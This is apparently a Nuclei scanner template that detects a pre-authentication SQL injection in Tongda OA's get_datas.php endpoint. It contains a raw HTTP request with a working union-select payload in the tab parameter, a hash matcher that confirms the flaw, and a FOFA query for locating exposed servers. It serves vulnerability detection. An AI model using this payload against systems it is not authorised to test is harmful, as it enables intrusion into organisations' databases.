id: TongDa-20

info:
  name: 通达OA get_datas.php接口存在前台SQL注入漏洞
  author: pussycat0x
  severity: high
  description: |
    通达OA get_datas.php接口存在前台SQL注入漏洞
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="通达OA网络智能办公系统"
  tags: TongDa,OA,SQL注入漏洞
request:
  - raw:
      - |
        GET /general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1&tab=5 where 1={`='` 2} union select md5(1)-- ' HTTP/1.1
        Host: {{RootURL}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
        Accept: */*
        Connection: Keep-Alive

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words: 
          - "c4ca4238a0b923820dcc509a6f75849b"